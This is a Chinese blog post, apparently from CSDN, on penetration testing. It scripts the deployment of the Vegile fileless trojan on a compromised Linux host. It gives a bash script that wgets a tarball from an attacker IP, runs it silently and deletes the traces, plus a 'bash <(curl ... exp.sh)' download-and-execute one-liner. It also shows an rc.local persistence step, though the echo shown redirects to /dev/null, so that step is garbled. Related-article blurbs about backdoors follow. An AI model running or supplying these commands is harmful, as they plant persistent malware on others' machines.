配置后门创建脚本与开机自启动

最新推荐文章于 2024-02-13 23:17:04 发布
最新推荐文章于 2024-02-13 23:17:04 发布
阅读量886 收藏 10
点赞数 5
分类专栏: Kali Linux 文章标签: 信息安全 渗透测试 MFS 开启自启 Kali Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125268409
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是配置后门创建脚本与开机自启动。

一、使用脚本自动创建后门

在上文Linux无文件木马程序渗透测试复现中,我们介绍了使用Vegile工具配置Linux系统的无文件木马。今天,我们在上文的基础上,配置实现脚本的自动化和开启自启动。
上文的渗透测试结果我们可以写成一个脚本,从而大大减少我们后期的操作。
我们将上文中的过程,编写为一个脚本,脚本内容如下所示:

#!/bin/bash
cd /tmp
wget 192.168.136.199/Vegile.tar.gz && tar xf Vegile.tar.gz && cd Vegile && ./Vegile --i second >>/dev/null 2>&1 && rm -rf /tmp/Vegile*

之后,我们在除此渗透获取SHELL后,直接执行命令:

bash <(curl -s -L 192.168.136.199/exp.sh)>>/dev/null 2>&1

上述命令表示下载该脚本的内容,并自动执行。
这样,就剩下了我们其他的复杂操作了。
在这里插入图片描述

二、配置开机自启动

此外,上述过程改进后,还存在一个问题,即目标设备在关机重启后,我们的木马程序就会失效,为了解决之一问题,我们需要把该目录程序添加成开启自启动。
我们在已经获取的SHELL中,执行命令:

echo "bash <(curl -s -L 192.168.136.199/exp.sh)>>/dev/null 2>&1" >> /dev/null 2>&1
chmod +x /etc/rc.d/rc.local

这样,目标设备重启后,又会重新执行我们的木马程序,以此来实现我们木马程序的持久化了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
专栏目录
脚本后门注入图片新方法(转载)
江湖·郎中·路
08-17 2624
 自从臭要饭的发布了那个脚本隐藏于图片中的程序之后(没看的朋友参见Bugkidz上的文章),不断就有人来说什么程序不好用拉,图片生成不了啦什么的。于是乎昨天我就重新研究了一下原理。突然想到了用一种新方法就是用copy命令进行图片与脚本的合并,却一直发现行不通,原因是不明:我一用copy合并后,图片的结构就被我破坏了,放到网页上不是图片只显示了一点就是干脆一个红叉。百思不得其解,发到论坛上请教又没人
Linux下关闭开机自启动程序
热门推荐
Young
02-05 1万+
Linux下关闭开机自启动程序 Author:youngdou Site: 转载请注明出处 yongdou.tk 问题最近启动自己的项目的时候来时出现这个错误caused by: java.net.BindException: 地址已在使用我的项目用了8080端口,应该是8080端口被占用了方案一先找到占用这个端口的进程,然后kill掉就可以了young@YOUNG:~$ sudo
[源码和文档分享]修改注册表的方式实现程序开机自启动
qq_38474647的博客
12-28 548
背景 想必实现程序开机自启动,是很常见的功能了。无论是恶意程序,还是正常的应用软件,都会提供这个功能,方便用户的使用。程序开机自启动,顾名思义,就是计算机开机后,不用人为地去运行程序,程序就可以自己运行起来。对于这个功能的,一直都是杀软重点监测的地方。因为,对于病毒来说,重要的不是如何被破坏,而是如何启动。 在过去写的大大小小的程序中,我也实现...
后门加密脚本
weixin_33933118的博客
03-22 122
作者:imspider 原文地址:https://www.t00ls.net/thread-29463-1-1.html 根据这篇帖子的算法写了个简单的文件加密:https://www.t00ls.net/thread-29456-1-1.html,什么大马小马加密出来的效果一模一样。 <?php $file = 'D:/Web/index.php'; /*要加密的文件*/ ...
linux服务自启动
firedragonpzy
05-09 127
[code="linux"]以下是我整理的一些有关"linux服务自动启动功能"方法,供大家参考. setup 、rc.local 和chkconfig三种方式都可以设置 第一种) 输入#setup指令进入系统服务菜单,选择你想启动的服务比如httpd,然后重起机器或者 /etc/rc.d./init.d/httpd start 第二种) 把启动命令放到/etc/...
python 后门脚本
西部壮仔的博客
03-14 906
脚本 点击下载 代码: # 1.编写usage函数 # 2.利用getopt模块从命令行获取参数值 # 3.区分客户端和服务端 # 4. 定义客户端代码,发送服务端命令行的回显内容 # 5. 定义服务端代码,接收命令,发动执行命令后的结果给客户端 # 6. 定义命令执行函数,执行客户端发送的命令 import socket import getopt #该模块用来获取命令行模块 import sy...
利用 “轻松访问” 轻松创建Windows后门
橘子女侠
03-04 3989
1. 实验概述 (1)实验环境: win7虚拟机; (2)实验描述: 打开win7虚拟机就可以看到左下角有个轻松访问的标志 ,这里面有六个应用,分别是讲述人,放大镜,高对比度,屏幕键盘,粘滞键,筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候,也容易被别人留个后门;如果说这六个应用中的一个被别人暗中替换掉了,那就可以...
Exp2 后门原理与实践 20204308李文艳
m0_61155000的博客
03-23 575
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2935
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 020-网络安全应急技术与实践(主机层-主机日志分析)
最新发布
时光隧道
02-13 8万+
主机日志分析是指对主机产生的日志进行收集、解析和分析的过程。主机日志包含了主机运行时产生的各种事件和信息,如操作系统启动和停止、服务启动和停止、进程创建和终止、网络连接和断开等。通过对主机日志进行分析,可以识别异常事件和行为,及时发现系统故障和安全威胁,并采取相应的措施处理。步骤描述1收集日志:通过配置日志收集器或代理,将主机上的日志数据发送到集中的日志存储或分析平台。2解析日志:对收集到的日志数据进行解析,将其转化为结构化的数据格式,方便后续的分析和查询。3。
windows脚本后门例子
weixin_33895516的博客
08-08 316
在讨论脚本后门前,先要介绍一类很有用的WMI对象。事实上,这才是本节的关键。脚本后门不过是它的一个应用而已。 前面已经说过,WMI是事件驱动的。整个事件处理机制分为四个部分: 1,事件生产者(provider):负责产生事件。WMI包含大量的事件生产者。有性能计数器之类的具体的事件生产者,也有类、实例的创建、修改、删除等通用的事件生产者。 2,事件过...
Shell后门脚本
秦子腾
10-13 447
执行后会发送邮件,如上图,我们可以通过这个方式登入服务器。说明:请在云服务器中执行,执行脚本后会发生。登入服务器后可以使用命令。
利用bash脚本自动化创建linux后门
weixin_43102772的博客
02-18 1283
思路 1.准备好木马程序backdoor放到/var/www/html目录下。 2.编写自动化脚本 1)在/var/www/html下创建脚本 2) 切换到工作目录 3) 用&&命令符把vegile执行后门命令的步骤用&&拼接。&&上一条执行成功后再执行&&后的下一条。 4) 因为vegile有个步骤是按任意键退出,所以需要使用到命...
自定义脚本后门(测试)
第九系艾文
08-31 929
代码很简洁,很容易理解 先搭建一个web服务器用来接收数据,脚本实在其他电脑上执行的,怎么将代码放到其电脑自己思考 shell脚本 #!/bin/bash #将脚本加载的开机启动项 starts(){ echo -e '#!/bin/sh\n#chkconfig: 2345 80 90\n#description:cmd\ncmd &' > /etc/rc.d/init.d/cmd chm
安全之路 —— C/C++实现后门的服务自启动
dengdao1372的博客
08-24 339
简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。 C++代码样例 ////////////////////////////////////////////////////////////// // // Fil...
python-后门脚本编写
m0_58265086的博客
09-23 423
2.1 sql盲注脚本
安全开发-Vsftpd2.3.4后门利用脚本编写
niqiu320的博客
05-12 521
靶场环境 定位 环境 IP Address 攻击机 Python3.8 主机ip 靶机 Metasploitable2 靶机ip 靶机:Metasploitable2 用户名:msfadmin 密码:msfadmin 步骤一:主机FTP登录 cmd->ftp 主机IP->回车->任意数字或字母:)->回车->任意密码->回车 以上操作完成后即可开启后门侦听6200端口 测试:可在靶机中输入:netstat -aupto | grep 6200
LINUX后门--教程(三)—— 一款短小精致的perl脚本SSH后门
W小哥
06-04 1295
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 靶机(kali):192.168.160.130 攻击机(centos8):192.168.160.131 2.1 perl脚本SSH后门介绍: 这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的ss
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值